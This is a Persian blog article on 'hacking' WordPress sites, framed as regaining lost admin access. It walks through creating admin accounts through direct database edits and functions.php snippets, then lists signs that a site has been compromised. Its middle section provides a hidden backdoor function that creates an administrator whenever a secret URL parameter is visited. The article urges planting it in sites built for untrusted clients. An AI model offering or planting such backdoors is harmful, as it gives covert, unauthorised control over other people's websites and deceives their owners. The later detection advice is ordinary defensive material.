هک سایت وردپرسی می تواند به شدت خطرناک باشد. به این دلیل که اگر هکری بتواند این کار را به راحتی انجام دهد می تواند وب سایت های بسیار زیادی را هک کند. به این دلیل که در حال حاضر تعداد بسیار زیادی از سایت های فعال با استفاده از پلتفرم وردپرس ساخته شده اند. در این مقاله می خواهیم روش های هک سایت وردپرسی را به شما بگوییم. البته استفاده از این روش ها اصلا پیشنهاد نمی شود!. اگر هم صاحب یک سایت وردپرسی هستید در انتها روش های تشخیص هک سایتتان را به شما خواهیم گفت.
ما هیچ گونه رفتار غیرقانونی یا بدخواهانه را نمی پذیریم، تایید نمی کنیم و تشویق نمی کنیم!. هدف این مقاله توضیح چگونگی هک کردن یا دسترسی مجدد به سایت وردپرسی است. که متعلق به شماست. یا اینکه شما حقوق ویرایش، سرپرست و دسترسی به آن را دارید. هر کاری که انجام می دهید، به تنهایی آن را انجام می دهید.
روشهای توصیفشده به شما کمک میکنند حتی اگر دیگر حسابی ندارید، دوباره به سایت دسترسی پیدا کنید. اما به اطلاعاتی در مورد سایت نیاز دارند و به شما کمک نمیکنند تا نصب تصادفی وردپرس را هک کنید.
اگر در یکی از شرایط زیر هستید، روشهای ما به شما کمک میکنند تا دوباره دسترسی داشته باشید:
نام کاربری یا آدرس ایمیل را فراموش کرده اید
گزینه بازنشانی رمز عبور در سرور میزبان کار نمی کند
ایمیل های بازنشانی رمز عبور ارسال نمی شوند
دیگر به آدرس ایمیل حساب دسترسی ندارید
شما نام کاربری و رمز عبور را می دانید، اما این ترکیب کار نمی کند
دسترسی FTP به سرور، یا
دسترسی سی پنل به سرور یا
دسترسی به پایگاه داده MySQL و امکان اتصال به آن از راه دور
از این روش برای تغییر رمز عبور (یا نام کاربری در صورت نیاز) یک کاربر موجود یا ایجاد یک حساب کاربری جدید استفاده کنید. شما به دسترسی cPanel یا دسترسی مستقیم MySQL به پایگاه داده سایت نیاز دارید. بیایید با تغییر رمز عبور یک کاربر موجود شروع کنیم.
اگر از cPanel استفاده میکنید، وارد شوید (cPanel همیشه از طریق پیوند https://yoursite.com:2083 قابل دسترسی است)، phpMyAdmin را پیدا کرده و باز کنید. لیست پایگاه های داده و جداول در سمت چپ است. شما به دنبال جدولی هستید که به _users ختم می شود. احتمالاً wp_users خواهد بود، اما اگر بیش از یک سایت وردپرس روی سرور نصب شده است، باید سایت مناسب را پیدا کنید.
جدول سمت راست، کاربری را که میخواهید ویرایش کنید را در خود دارد. اگر از طریق سرویس گیرنده خارجی مانند SQLyog به MySQL متصل می شوید، همین رویه را دنبال کنید. هنگامی که جدول و رکورد واقعی کاربر را پیدا کردید، وقت آن است که رمز عبور را تغییر دهید.
همانطور که احتمالاً تاکنون متوجه شده اید، رمز عبور در قسمت user_pass ذخیره می شود و با استفاده از الگوریتم MD5 هش می شود. ژنراتور MD5 آنلاین را باز کنید، رمز عبوری را که میخواهید استفاده کنید وارد کنید و روی «Hash» کلیک کنید. رشته تولید شده را کپی کرده و رمز اصلی را با آن جایگزین کنید. در phpMyAdmin می توانید با دوبار کلیک کردن روی آن فیلد را ویرایش کنید. رویه مشابه سایر کلاینت های MySQL است. تغییرات را ذخیره کنید و با رمز عبور جدید خود وارد وردپرس شوید.
جدول کاربران WP نامهای کاربری، گذرواژههای هششده و ایمیلها در جدول پایگاه داده wp_users ذخیره میشوند.
ایجاد یک کاربر جدید کمی پیچیده تر است اما هنوز در کمتر از یک دقیقه قابل مدیریت است. یک رکورد جدید در جدول کاربر ایجاد کنید و user_login، user_pass (هش شده، با استفاده از تابع MD5 که در بالا توضیح داده شد) و user_email را پر کنید. تمام فیلدهای دیگر می توانند خالی بمانند. آنها مهم نیستند رکورد جدید را ذخیره کنید. پس از ذخیره، MySQL یک شناسه منحصر به فرد به آن می دهد. این شماره در قسمت شناسه است. آن را به خاطر بسپار.
اکنون به جدول _usermeta بروید. به یاد داشته باشید، پیشوند جدول باید با پیشوند کاربران یکی باشد. به عنوان مثال wp_users و wp_usersmeta. اگر پیشوند یکسان نیست، در حال ویرایش جدول اشتباهی (برخی نصب WP دیگر) هستید و حساب جدید کار نخواهد کرد. ما دو رکورد جدید ایجاد خواهیم کرد. فیلد umeta_id را برای هر دوی آنها نادیده بگیرید. فیلد user_id را روی مقداری که به تازگی به خاطر آورده اید (مقدار شناسه جدید در جدول کاربر) تنظیم کنید. برای اولین رکورد، meta_key را روی wpct_user_level و meta_value را به 10 تنظیم کنید.
برای دومین meta_key را به wpct_capabilities و meta_value را به a:1:{s:13:”administrator”;b:1;} تنظیم کنید. هر دو را ذخیره کنید. کار شما تمام شد – وارد شوید!
این رویکرد را می توان با ویرایش functions.php از طریق cPanel یا با استفاده از یک سرویس گیرنده FTP برای انجام این کار مورد استفاده قرار داد. اگر از cPanel استفاده می کنید، File Manager را پیدا کنید و آن را باز کنید. ابتدا باید پوشه تم فعال را پیدا کنیم.
به پوشه public_html/wp_content/themes بروید. اگر بلافاصله موضوع خود را مشاهده کردید و بدانید که کدام یک است – عالی است. پوشه آن را باز کنید و ویرایش functions.php را شروع کنید. اگر نه، سایت را باز کنید، در هر نقطه راست کلیک کنید، “مشاهده منبع” را انتخاب کنید. سپس Ctrl + F را فشار دهید و شروع به تایپ /themes/ کنید به زودی نشانیهای اینترنتی زیادی برجسته میشوید و نام پوشه تم فعال را میشناسید.
آن را در ساختار فایل پیدا کنید، آن را باز کنید و ویرایش functions.php را شروع کنید. کد زیر را در انتهای فایل کپی/پیست کنید. اگر برچسبهای PHP را دارید، به پایان ؟> توجه کنید. آنها باید در خط آخر باشند. بنابراین، کد را قبل از آنها وارد کنید.
$new_user_email = 'myemail@domain.com'; $new_user_password = '12345'; if(!username_exists($new_user_email)) { $user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email); wp_update_user(array('ID' => $user_id, 'nickname' => $new_user_email)); $user = new WP_User($user_id); $user->set_role('administrator'); }
خطوط کد برای منعکس کردن حساب جدید شما. اگر قبلاً کاربری در WP با آن ایمیل وجود داشته باشد، حساب جدیدی ایجاد نخواهد شد، بنابراین مطمئن شوید که جدید است. رمز عبور را نیز تغییر دهید – توسط بچه های اسکریپت هک نشوید. پس از ذخیره فایل، به سادگی سایت خود را باز کنید، کد اجرا می شود، یک حساب کاربری جدید با امتیازات سرپرست ایجاد می شود و می توانید با آن وارد سیستم شوید.
پس از انجام این کار، به یاد داشته باشید که کد را از functions.php حذف کنید.
با دانستن رمز عبور FTP، cPanel یا MySQL ثابت میکنید که حق دسترسی قانونی به سرور را دارید . بنابراین باید به نصب(های) وردپرس نیز دسترسی داشته باشید. اگر هیچکدام از آن حسابها را ندارید، در این صورت کار خوبی ندارید (هک کردن سایتهای افراد دیگر)، و این خوب نیست!
لطفاً به یاد داشته باشید که دسترسی غیرمجاز به هر رایانه، سایت یا سرور یک جرم جدی است و در اکثر کشورها به سرعت با آن برخورد می شود.
وقتی درب جلو بسته است، ممکن است درب عقب را امتحان کنید. این ممکن است مانند یک روش مخرب برای استفاده از کد برای ورود به سایت بدون دسترسی به آن به نظر برسد، اما در واقع مواقعی وجود دارد که اگر شخصی آن را به سرقت برد، باید سایت خود را کنترل کنید.
اگر کاری که شما انجام می دهید برای افراد دیگر وب سایت ایجاد می کند، دیر یا زود مشتری پیدا می شود که از پرداخت پول برای کار شما امتناع می کند. مشتری که اطلاعات ورود شما را حذف می کند و کنترل همه کارهایی که انجام داده اید را به دست می گیرد. گاهی اوقات، ایجاد یک کاربر جدید از طریق FTP یا بازنشانی رمز عبور کافی است. وقتی این کافی نیست، ممکن است بخواهید راه خود را به داخل هک کنید یا دسترسی درب پشتی به صفحات مدیریت خود ایجاد کنید.
اما اگر تصمیم گرفتید قطعه کوچکی از کد را در محیط وردپرس خود مخفی کنید، ممکن است کمی وقار خود را حفظ کنید و با امتیازات مدیر به سایت وردپرس دسترسی پیدا کنید. و این جایی است که بازی ها شروع می شوند.
ایجاد یک درب پشتی:
خوب، با صحبت کافی است. در اینجا یک قطعه کد وجود دارد که برای انجام کار به آن نیاز دارید:
فایل functions.php را باز کنید
کد زیر را کپی/پیست کنید:
add_action('wp_head', 'wploop_backdoor'); function wploop_backdoor() { If ($_GET['backdoor'] == 'knockknock') { require('wp-includes/registration.php'); If (!username_exists('username')) { $user_id = wp_create_user('name', 'pass'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>
اگر کد را همانطور که هست بگذارید، تنها کاری که باید برای ایجاد یک سرپرست جدید در سایت انجام دهید این است که از http://www.yourdomain.com/?backdoor=knockknock بازدید کنید.
پس از بارگیری صفحه، نام کاربری جدید شما «name» و رمز عبور «password» است.
البته، میتوانید با تغییر «name» و «pass» به هر چیزی که میخواهید، آن را در کد بالا تغییر دهید. همچنین میتوانید با تغییر «درپشتی» به هر چیزی که به ذهنتان میرسد، پیوند به در پشتی خود را تغییر دهید.
این عملکرد را امتحان کنید – نه تنها سرگرم کننده است، بلکه واقعاً می تواند در آینده به شما کمک کند، زمانی که می خواهید یک وب سایت برای شخصی بسازید که نمی توانید کاملاً به او اعتماد کنید. همچنین باید مهارت های وردپرس و وبلاگ نویسی خود را ارتقا دهید.
ایجاد حسابهای کاربری جدید در وردپرس بسیار آسان است. به عنوان یک مدیر، باید به صفحه مدیریت کاربران بروید، جایی که می توانید یک حساب کاربری جدید برای هر نقش کاربری ایجاد کنید. این کار را می توان در عرض چند ثانیه انجام داد و کاربر تازه ایجاد شده می تواند بلافاصله با نام کاربری و رمز عبور داده شده وارد شود.
اما اگر دسترسی به ادمین وردپرس خود را از دست بدهید چه اتفاقی می افتد؟ ممکن است اوضاع کمی پیچیدهتر شود، اما نگران نباشید – ما یک عملکرد برای شما داریم که میتواند زندگی مدیر شما را نجات دهد.
چه سرپرست دیگری حساب شما را حذف کرده باشد، چه همه کاربران را به اشتباه از پایگاه داده حذف کرده باشید، از یک افزونه ناکارآمد استفاده کرده باشید یا هک شده باشید، همچنان میتوانید کنترل را به دست بگیرید. گاهی اوقات ممکن است بتوانید فقط به سرور FTP خود دسترسی داشته باشید در حالی که HTTP از دسترس شما خارج است و باید یک مدیر جدید ایجاد کنید. در حالی که ممکن است یک مورد نادر باشد، عملکرد زیر شما را نجات می دهد.
برای ایجاد یک حساب کاربری جدید خارج از محیط مدیریت وردپرس، تنها چیزی که نیاز دارید دسترسی FTP به سایت خود است. به عنوان یک ادمین، شما باید تمام اطلاعات مورد نیاز برای ورود به سرور خود را داشته باشید و می توانید با ایجاد یک تابع جدید در قالب خود، به سرعت یک حساب کاربری جدید ایجاد کنید.
کلاینت FTP را باز کنید و به حساب خود متصل شوید
به wp-content/themes بروید
پوشه تم مورد استفاده خود را باز کنید
فایل functions.php را جستجو کرده و آن را ویرایش کنید
تابع زیر را کپی و پیست کنید:
function admin_account(){ $user = 'Username'; $pass = 'Password'; $email = 'email@domain.com'; if ( !username_exists( $user ) && !email_exists( $email ) ) { $user_id = wp_create_user( $user, $pass, $email ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } add_action('init','admin_account');
نام کاربری، رمز عبور و ایمیل را به چیزی منحصربفرد تغییر دهید
مطمئن شوید که نام کاربری، رمز عبور و آدرس ایمیلی که در تابع تنظیم کردهاید منحصربهفرد هستند یا در غیر این صورت عملکرد به درستی کار نمیکند. وقتی تغییرات را ذخیره کردید، کارتان تمام شد و میتوانید به پانل ورود به سیستم WP خود بروید. از اطلاعات جدید برای ورود مجدد استفاده کنید و پس از تأیید حساب، می توانید تابع را از فایل functions.php حذف کنید.
عملکرد نشان داده شده در بالا یک حساب کاربری ایجاد می کند، اما می توانید به راحتی آن را تغییر دهید تا یک حساب کاربری با هر نقش کاربری دیگری ایجاد کنید. به سادگی نقش موجود در ردیف هشتم کد را به ویرایشگر، نویسنده، مشارکتکننده، مشترک یا هر نقش کاربری دیگری که ایجاد کردهاید تغییر دهید.
متأسفانه، اگر حساب کاربری ادمین خود را از دست داده باشید، تمام پست هایی که تحت آن نام کاربری نوشته شده اند را نیز از دست داده اید. به همین دلیل است که همیشه باید یک نسخه پشتیبان داشته باشید که بتوانید به راحتی آن را بازیابی کنید. اگر در حین داشتن حساب مدیریت خود این مطلب را می خوانید، این را به عنوان یادآوری برای ایجاد یک نسخه پشتیبان فوراً در نظر بگیرید و این مقاله را نشانه گذاری کنید فقط در صورتی که در آینده نیاز به ایجاد یک حساب کاربری خارج از وردپرس داشته باشید.
وردپرس یک پلت فرم وبلاگ نویسی بزرگ است. میلیون ها کاربر وجود دارد و به نظر می رسد که تعداد آنها هر روز به سرعت در حال افزایش است. مردم حتی تمایل دارند وب سایت های خود را که در سیستم های مدیریت محتوای دیگر ایجاد شده اند، بیشتر از آنچه فکر می کنید به این سیستم منبع باز منتقل کنند. و در حالی که این خوب است، به این معنی است که هکرها در هنگام تلاش برای حمله به سایتهای تصادفی، وردپرس را در رتبه اول قرار میدهند.
معمولاً اگر هک شوید، فوراً از آن مطلع خواهید شد. سایت شما غیر قابل دسترس خواهد شد. شما نمی توانید وارد شوید و گاهی اوقات یک هکر پیامی را در صفحه اول می گذارد. اما اغلب اوقات، ممکن است حتی متوجه تغییر چیزی نشوید. در این قسمت از مقاله، ما قصد داریم چندین نشانه را به شما نشان دهیم که ممکن است به شما نشان دهد که سایت وردپرس شما هک شده است و چند راه حل برای این مشکل.
این علامت تقریباً مشهود است. اگر برای مدتی بدون مشکل از ترکیب نام کاربری و رمز عبور استفاده کرده اید، اگر ناگهان وردپرس حساب شما را نشناسد ممکن است مشکوک شوید. اگر یک هکر وارد سایت شما شود، این احتمال وجود دارد که به سرعت امتیازات مدیریت شما را تغییر دهد.
شاید او مجبور به تغییر رمز عبور شما یا حذف کامل حساب شما شده است. قبل از اینکه بعد از اولین باری که وردپرس در مورد نام کاربری/رمز عبور نادرست به شما پیام میدهد وحشت کنید، لطفاً این واقعیت را در نظر بگیرید که ممکن است ترکیب اشتباهی وارد کرده باشید یا ممکن است دکمه caps lock را روشن کرده باشید.
راه حل: سعی کنید رمز عبور را از طریق ایمیل بازیابی کنید یا از حساب دیگری برای ورود مجدد استفاده کنید. برای اطمینان از ایمن ماندن ورود به سیستم، توصیه می کنیم افزونه Login Ninja را برای وردپرس نصب کنید.
اگر متوجه محتوای ناآشنا در سایت خود شوید، ممکن است شروع به نگرانی کنید. زمانی که هکرها فرصتی برای دسترسی به بخش مدیریت شما پیدا می کنند، می توانند هسته شما و هم تم و هم فایل های افزونه شما را تغییر دهند. این بدان معناست که آنها می توانند هر چیزی را که می خواهند تغییر دهند.
در حالی که برخی از هکرها ظاهر سایت شما را به شدت تغییر می دهند و حتی ممکن است بگویند که شما هک شده اید، سایرین در مورد آن بسیار ظریف تر خواهند بود.
راه حل: سعی کنید به دنبال محتوای پنهان در کد وب سایت باشید. ممکن است لینک هایی به سایت های مخرب هکرها در پاورقی سایت شما نصب شده باشد، یا ممکن است پنجره های بازشو نصب کرده باشند که به طور منظم برای مشتریان شما باز می شوند. از Security Ninja استفاده کنید تا سایت خود را اسکن کنید یا به طور مداوم سایت خود را برای چنین مشکلاتی زیر نظر داشته باشید.
اگر وب سایت خود را ردیابی نمی کنید، باید بلافاصله این کار را شروع کنید. یک راه ساده برای انجام این کار، استفاده از Google Analytics است که در میان بسیاری از ویژگیهای دیگر، میتواند به شما بگوید چه تعداد بازدید میکنید و این بازدیدها از کجا میآیند. پس از مدتی با وب سایت خود آشنا خواهید شد. این بدان معناست که میدانید بازدیدها از کجا میآیند، میدانید چه زمانی یک کمپین جدید راهاندازی میکنید و چه زمانی لینکهای تبلیغاتی جدید در طبیعت منتشر میشوند.
اما اگر به طور ناگهانی متوجه شدید که سایت شما تعداد زیادی بازدید جدید از دامنه مشکوک دریافت می کند، می خواهید این موضوع را بیشتر بررسی کنید زیرا ممکن است سایت شما هک شود. معمولاً این نوع بازدید منجر به نرخ پرش 100٪ می شود که به این معنی است که فقط یک صفحه قابل دسترسی است. هکرها اغلب از سیستم های خودکار استفاده می کنند که سایر سایت های بد را به سایت شما هدایت می کند. خواه کد بدی باشد که در سایت شما اجرا می شود یا بخشی از یک شبکه اسپم شده اید، همه چیز می تواند جدی شود و شما باید سایت خود را برای کدهای مخرب بررسی کنید.
راه حل: از Google Webmasters Tools برای یافتن دامنه های مشکوک استفاده کنید. با این کار می توانید از هک سایت وردپرسی خود جلوگیری کنید.
برخلاف آخرین علامت ذکر شده در مورد هک شدن، این مورد ممکن است به شما هشدار دهد زیرا به طور ناگهانی تعداد بازدیدها کاهش می یابد. یک هکر به جای ارجاع بازدیدهای جدید به شما، ممکن است بازدیدها را از سایت شما دور کند. این ممکن است به این دلیل اتفاق بیفتد که یک هکر سایت شما را به سایت دیگری هدایت کرده است. دلیل دیگر کاهش بازدیدکنندگان این است که گوگل سایت شما را در لیست سیاه قرار داده است. این عمل به هر کاربری که ممکن است تصمیم بگیرد سایت شما را به دلیل آلوده بودن باز نکند، پیامی نشان می دهد.
راه حل: از «وضعیت سایت مرور ایمن Google» استفاده کنید تا بررسی کنید آیا سایت شما بهعنوان ناامن علامتگذاری شده است و بازدید از آن در حال حاضر خطرناک است.
اگر هیچ تغییری در سایت خود مشاهده نکرده اید، اما متوجه شده اید که نتایج جستجو در گوگل و سایر موتورهای جستجو عجیب هستند (عناوین مختلف و سایر متا داده ها را نشان می دهد)، این ممکن است نشانه واضحی از یک سایت هک شده باشد. ممکن است یک هکر محتوای شما را طوری تغییر داده باشد که فقط برای یک متخصص قابل مشاهده باشد. با این حال، این تغییر در نتایج موتور جستجو قابل مشاهده است.
راه حل: سایت خود را با Google Webmasters Tools بررسی کنید و بررسی کنید که آیا سایت شما با این ابزار آنلاین رایگان هک شده است.
هنگامی که یک هکر به سایت شما دسترسی پیدا می کند، احتمالاً می خواهد از سرور شما برای ارسال هرزنامه به دیگران استفاده کند. وقتی متوجه می شوید که نمی توانید ایمیل های جدیدی از وردپرس خود ارسال یا دریافت کنید، این می تواند نشانه واضحی از هک شدن شما باشد. یک بار دیگر ایمیل خود را بررسی کنید، سپس آن را با ارائه دهنده خود بررسی کنید تا مطمئن شوید که هیچ خطایی وجود ندارد.
راه حل: عملکرد ایمیل وردپرس خود را با این افزونه رایگان آزمایش کنید.
مواقعی وجود دارد که هکرها برای نصب کدهای مخرب، هدایت کاربران یا استفاده از ایمیل شما برای هرزنامه به سایت شما دسترسی نمییابند. گاهی اوقات، تنها کاری که آنها می خواهند انجام دهند این است که سایت شما را خراب کنند. به ندرت، یک هکر با موفقیت همه چیز را از کل سرور حذف می کند. به همین دلیل مهم است که فایلهای خود را در یک شرکت میزبانی معروف میزبانی کنید که امنیت را به همراه داشته باشد و همچنین روزانه یا حداقل هفتگی از وبسایت شما نسخه پشتیبان تهیه کند. این یک تمرین خوب است که هر از چند گاهی از خودتان نسخههای پشتیبان تهیه کنید تا سایت به سرعت بازیابی شود.
راه حل: یکی از بهترین افزونه ها برای مدیریت پشتیبان در وردپرس را نصب کنید. با این کار از هک سایت وردپرسی خود جلوگیری می کنید.
بیشتر بخوانید : 9 روش برای جلوگیری از هک سایت
مشابه محتوای مخربی که ممکن است به فایلهای موجود اضافه شود، یک هکر ممکن است فایلهای اضافی را در هر جایی از پوشه ریشه شما نصب کند. دانستن راه خود در وردپرس چیز خوبی است، اما اگر آنقدر باتجربه نیستید، باید یک ابزار امنیتی در اختیار داشته باشید که می تواند تمام فایل ها و فعالیت های شما را بررسی کند. اخیراً، Security Ninja را بررسی کردیم که ابزاری عالی برای بررسی همه فایلهای وردپرس شماست.
راه حل: سعی کنید به دنبال فایل هایی بگردید که به نصب وردپرس شما تعلق ندارند. از امنیت نینجا برای اسکن کردن سایت خود به طور منظم و یافتن خودکار آن فایل ها استفاده کنید. سپس فایل ها را حذف کنید یا کدهای مخرب را از فایل های آلوده حذف کنید. افزونه Core Scanner برای Security Ninja را فراموش نکنید.
بسته به سایت خود، ممکن است شما تنها کسی باشید که می توانید اعضای جدید اضافه کنید. در این صورت، ایمیلی که به شما در مورد کاربرانی که به تازگی ثبت نام کرده اند می گوید ممکن است یک زنگ هشدار ایجاد کند. اگر مدیران دیگری هستند که توانایی اضافه کردن اعضای جدید را دارند، در مورد فعالیت مشکوک با آنها مشورت کنید.
راه حل: URL ورود به سیستم را با یک افزونه رایگان تغییر دهید، دسترسی به صفحه ورود به سیستم وردپرس خود را با استفاده از فایل .htpasswd محدود کنید و همیشه از Login Ninja استفاده کنید تا از فرم ورود خود محافظت کنید.
گاهی اوقات، یک هکر پس از یافتن راه خود، کاری با وبسایت شما انجام نمیدهد. در عوض، رویدادهای برنامهریزیشدهای را ترک میکند که ممکن است در آینده به سایت شما آسیب برساند. این تکنیک خطرناک است زیرا یک هکر می تواند قربانیان بی تجربه را در ابتدا بی خبر بگذارد. ممکن است شما آلوده شده باشید و چیزی در مورد آن ندانید.
راه حل: کارهای CRON خود را در سروری که از آن استفاده می کنید بررسی کنید و مطمئن شوید که هیچ کار مشکوکی برنامه ریزی شده وجود ندارد.
امیدواریم این مقاله به شما کمک کند حتی یک سایت وردپرس ایمن تر را مدیریت کنید و در شرایط بد به شما کمک کند دوباره به آن دسترسی پیدا کنید. و حتی اگر سایت شما تمیز است، لطفاً آن را بدیهی نگیرید. همیشه مطمئن شوید که وبلاگ شما تا آنجا که می تواند ایمن باشد. ما افزونههای امنیتی را برای وردپرس پیشنهاد میکنیم که در بیشتر مواقع میتوانند شما را نجات دهند. با این حال، کسی نباشید که از گذرواژه ناامن استفاده میکند و هنگام هک کردن سایت وردپرس خود مراقب باشید.